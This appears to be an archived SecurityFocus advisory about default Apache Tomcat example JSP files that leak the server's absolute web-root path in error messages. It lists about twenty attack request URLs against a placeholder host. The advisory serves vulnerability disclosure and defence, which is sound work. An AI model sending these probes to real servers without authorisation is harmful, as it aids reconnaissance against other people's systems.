28 lines
No EOL
1.3 KiB
Text
28 lines
No EOL
1.3 KiB
Text
source: http://www.securityfocus.com/bid/4877/info
|
|
|
|
Apache Tomcat is a freely available, open source web server maintained by
|
|
the Apache Foundation.
|
|
|
|
When Apache Tomcat is installed with a default configuration, several example files are also installed. When some of these example files are requested without any input, they will return an error containing the absolute path to the server's web root.
|
|
|
|
The attacker can submit a request in one of the following formats:
|
|
http://webserver/test/jsp/pageInfo.jsp
|
|
http://webserver/test/jsp/pageImport2.jsp
|
|
http://webserver/test/jsp/buffer1.jsp
|
|
http://webserver/test/jsp/buffer2.jsp
|
|
http://webserver/test/jsp/buffer3.jsp
|
|
http://webserver/test/jsp/buffer4.jsp
|
|
http://webserver/test/jsp/comments.jsp
|
|
http://webserver/test/jsp/extends1.jsp
|
|
http://webserver/test/jsp/extends2.jsp
|
|
http://webserver/test/jsp/pageAutoFlush.jsp
|
|
http://webserver/test/jsp/pageDouble.jsp
|
|
http://webserver/test/jsp/pageExtends.jsp
|
|
http://webserver/test/jsp/pageImport2.jsp
|
|
http://webserver/test/jsp/pageInfo.jsp
|
|
http://webserver/test/jsp/pageInvalid.jsp
|
|
http://webserver/test/jsp/pageIsErrorPage.jsp
|
|
http://webserver/test/jsp/pageIsThreadSafe.jsp
|
|
http://webserver/test/jsp/pageLanguage.jsp
|
|
http://webserver/test/jsp/pageSession.jsp
|
|
http://webserver/test/jsp/declaration/IntegerOverflow.jsp |